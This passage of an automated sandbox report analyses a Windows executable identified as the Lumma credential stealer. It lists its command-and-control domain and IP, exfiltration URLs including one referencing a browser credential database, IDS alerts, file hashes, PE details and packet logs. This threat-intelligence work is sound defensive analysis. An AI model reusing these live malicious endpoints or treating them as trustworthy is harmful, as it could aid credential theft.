                                                          http://crl.microsoft7_6file.exe, 00000000.00000003.2728000075.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727444417.0000000000D94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://necklacedmny.store/api=file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://necklacedmny.store/apia8&_Zfile.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://necklacedmny.store/apidbfile.exe, 00000000.00000002.3078400834.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://necklacedmny.store/file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066757426.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074641701.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727357507.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067139929.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575762347.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078611352.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727984519.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://necklacedmny.store:443/api.default-release/key4.dbPKfile.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://necklacedmny.store/apisfile.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://necklacedmny.store/apikfile.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  188.114.96.3
                                                                                  		necklacedmny.storeEuropean Union
                                                                                  		13335CLOUDFLARENETUStrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1544423
                                                                                  Start date and time:2024-10-29 12:03:11 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 10s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:6
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:file.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 2
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target file.exe, PID 2736 because there are no executed function
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: file.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  07:04:07API Interceptor2464377x Sleep call for process: file.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  188.114.96.3QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • filetransfer.io/data-package/jI82Ms6K/download
                                                                                  9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                                  DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.globaltrend.xyz/b2h2/
                                                                                  transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/Gitmx
                                                                                  19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zonguldakescortg.xyz/483l/
                                                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rtpngk.xyz/876i/
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • www.fnsds.org/
                                                                                  rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                  • dddotx.shop/Mine/PWS/fre.php

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  necklacedmny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUS#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.htaGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.155.19
                                                                                  #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.195.227
                                                                                  http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=Get hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.16.55.19
                                                                                  https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                                  • 104.17.24.14
                                                                                  Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 162.247.243.29
                                                                                  Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..emlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 162.247.243.29
                                                                                  https://drive.google.com/file/d/17u2rFuD1QXpsDx5iT2qtwqYKrUIXQ7Kt/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  October 25, 2024_SAL_RefIyNURVhUTlVNUkFORE9NMTAjIw==.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  https://drive.google.com/file/d/17u2rFuD1QXpsDx5iT2qtwqYKrUIXQ7Kt/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  No created / dropped files found

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.575758449772259
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:2'922'496 bytes
                                                                                  MD5:dc20ee0ac31f3e17cbd727de4644f7aa
                                                                                  SHA1:7b688e73f50ac2a4241681e996410efeec4e0775
                                                                                  SHA256:d20226e20ceb5d5f0440c642f10506fbdceaa23e3c598478118e46f0dd932990
                                                                                  SHA512:634b7e8cb488ad49ca9b94e7311c323744eb3c430a45e1e0d077dd4c9a86c882e11a8791aef549627df8686021bc940525bdc53c231a9cdab49ceaff853e8f63
                                                                                  SSDEEP:49152:aOMADD8jFx7ISH5AFYymmLhglCVGG/H0a5CXbEl1sOR42LL:ZMSD8rsSH5AFYnWKlCVz09ysORTf
                                                                                  TLSH:9BD54B52F506F1CFD88A16B444A7CE89AE9D43B8473468C3AD9CB4BB7E63CC115BAC14
                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.........................../......~-...@.................................T...h..

                                                                                  File Icon

                                                                                  Icon Hash:00928e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x6fb000
                                                                                  Entrypoint Section:.taggant
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp 00007F0CB0D71FDAh
                                                                                  pcmpeqd mm5, qword ptr [eax+eax]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  jmp 00007F0CB0D73FD5h
                                                                                  add byte ptr [eax+00000000h], ch
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ecx], al
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [edx], al
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [ebx], cl
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [ebx], al
                                                                                  or al, byte ptr [eax]
                                                                                  add byte ptr [edx+ecx], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  push es
                                                                                  add byte ptr [eax], 00000000h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  adc byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add al, 0Ah
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  xor byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  pop ds
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  0x10000x580000x27e00947668de471bf9e670bc743712c0f3a8False0.9979489126175548data7.978490875244356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  eijsszyp0x5b0000x29f0000x29e200cf3ee40f2524db99fed4879a596fe5dcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  xxbxeocn0x2fa0000x10000x400f3b76677b48dfbdffa15417e39167c45False0.734375data5.904217744273698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .taggant0x2fb0000x30000x220085d72af0b7f23f8ac3b158372fc683fdFalse0.08409926470588236DOS executable (COM)0.8608863210046287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                  Imports

                                                                                  DLLImport
                                                                                  kernel32.dlllstrcpy

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-29T12:04:10.277153+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709188.114.96.3443TCP
                                                                                  2024-10-29T12:04:10.277153+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709188.114.96.3443TCP
                                                                                  2024-10-29T12:04:12.556685+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649710188.114.96.3443TCP
                                                                                  2024-10-29T12:04:12.556685+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.96.3443TCP
                                                                                  2024-10-29T12:04:50.576456+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649712188.114.96.3443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 29, 2024 12:04:09.080579996 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.080615044 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:09.080712080 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.107820988 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.107834101 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:09.755280018 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:09.755530119 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.759188890 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.759201050 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:09.759464979 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:09.798584938 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.826407909 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.826474905 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:09.826647997 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.277179003 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.277267933 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.277328014 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.279336929 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.279336929 CET49709443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.279349089 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.279357910 CET44349709188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.421353102 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.421463013 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:10.421545029 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.421960115 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:10.422000885 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:11.055087090 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:11.055161953 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:11.057143927 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:11.057157040 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:11.057493925 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:11.058986902 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:11.059011936 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:11.059077978 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.556696892 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.556797028 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.556873083 CET49710443192.168.2.6188.114.96.3
                                                                                  Oct 29, 2024 12:04:12.556926012 CET44349710188.114.96.3192.168.2.6
                                                                                  Oct 29, 2024 12:04:12.568106890 CET44349710188.114.96.3192.168.2.6
